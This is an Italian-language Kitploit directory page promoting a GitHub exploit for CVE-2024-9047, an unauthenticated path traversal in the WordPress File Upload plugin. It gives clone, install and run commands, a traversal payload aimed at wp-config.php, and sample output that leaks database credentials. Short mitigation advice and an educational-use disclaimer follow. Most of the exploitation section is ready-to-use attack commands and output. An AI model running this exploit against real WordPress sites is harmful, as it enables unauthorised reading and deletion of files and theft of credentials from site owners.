Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9047-Exploit — Exploit per WordPress File Upload Plugin - Tutte le versioni fino alla 4.24.11 sono vulnerabili. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-9047-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Exploit per WordPress File Upload Plugin - Tutte le versioni fino alla 4.24.11 sono vulnerabili.

Vedi Repository
411 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-9047: Exploit per il plugin WordPress File Upload

Descrizione

Il plugin WordPress File Upload per WordPress è vulnerabile a una vulnerabilità di Path Traversal in tutte le versioni fino alla 4.24.11 inclusa, tramite il file wfu_file_downloader.php. Questa vulnerabilità consente a un attaccante non autenticato di leggere o eliminare file al di fuori della directory prevista. Lo sfruttamento riuscito richiede che l'installazione di WordPress target esegua PHP 7.4 o precedente.

Impatto

  • Gravità: Critica
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore d'attacco: Rete
  • Autenticazione richiesta: No

Sfruttamento

Un attaccante può sfruttare questa vulnerabilità creando una richiesta specifica all'endpoint vulnerabile, wfu_file_downloader.php, e manipolando il parametro del percorso del file per ottenere accesso non autorizzato a file sensibili sul server.


Dettagli dell'Exploit

Requisiti

  • L'installazione di WordPress target deve avere il plugin vulnerabile installato (4.24.11 o precedente).
  • Il server deve eseguire PHP versione 7.4 o precedente.

Passaggi per lo sfruttamento

  1. Clona questo repository:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Installa le dipendenze Python (se necessario):

    root@kitploit:~
    pip install requests
    
  3. Esegui lo script per controllare la versione del plugin e sfruttare la vulnerabilità:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Esempio di utilizzo

Per sfruttare la configurazione vulnerabile predefinita e leggere il file di configurazione di WordPress:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Risultato

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Mitigazione

Per proteggere il tuo sito WordPress:

  1. Aggiorna il plugin WordPress File Upload all'ultima versione.
  2. Assicurati che la versione di PHP sia aggiornata a una versione supportata (superiore a 7.4).
  3. Limita i permessi dei file per impedire accessi non autorizzati a file sensibili.
  4. Usa un Web Application Firewall (WAF) per bloccare richieste dannose.

Disclaimer

Questo codice è destinato esclusivamente a scopi educativi e di ricerca. L'uso non autorizzato di questo script su sistemi di cui non si possiede la proprietà o per i quali non si ha esplicita autorizzazione è illegale e non etico. Gli autori declinano ogni responsabilità per qualsiasi uso improprio di questo codice.

Scarica lo strumento